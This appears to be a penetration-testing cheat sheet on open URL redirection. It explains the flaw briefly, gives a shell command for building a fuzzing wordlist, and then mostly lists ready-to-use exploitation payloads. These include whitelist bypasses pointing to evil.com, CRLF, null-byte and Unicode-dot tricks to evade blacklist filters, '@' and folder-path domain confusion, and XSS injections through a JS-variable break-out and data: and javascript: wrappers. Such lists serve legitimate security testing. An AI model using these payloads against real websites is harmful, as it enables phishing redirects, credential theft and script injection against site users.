# Open URL Redirection Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. ## Fuzzing Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL. ```powershell WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt ``` ## Exploitation Using a whitelisted domain or keyword ```powershell www.whitelisted.com.evil.com redirect to evil.com ``` Using CRLF to bypass "javascript" blacklisted keyword ```powershell java%0d%0ascript%0d%0a:alert(0) ``` Using "//" to bypass "http" blacklisted keyword ```powershell //google.com ``` Using "https:" to bypass "//" blacklisted keyword ```powershell https:google.com ``` Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) ```powershell \/\/google.com/ /\/google.com/ ``` Using "%E3%80%82" to bypass "." blacklisted character ```powershell //google%E3%80%82com ``` Using null byte "%00" to bypass blacklist filter ```powershell //google%00.com ``` Using "@" character, browser will redirect to anything after the "@" ```powershell http://www.theirsite.com@yoursite.com/ ``` Creating folder as their domain ```powershell http://www.yoursite.com/http://www.theirsite.com/ http://www.yoursite.com/folder/www.folder.com ``` XSS from Open URL - If it's in a JS variable ```powershell ";alert(0);// ``` XSS from data:// wrapper ```powershell http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== ``` XSS from javascript:// wrapper ```powershell http://www.example.com/redirect.php?url=javascript:prompt(1) ``` ## Thanks to * filedescriptor * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)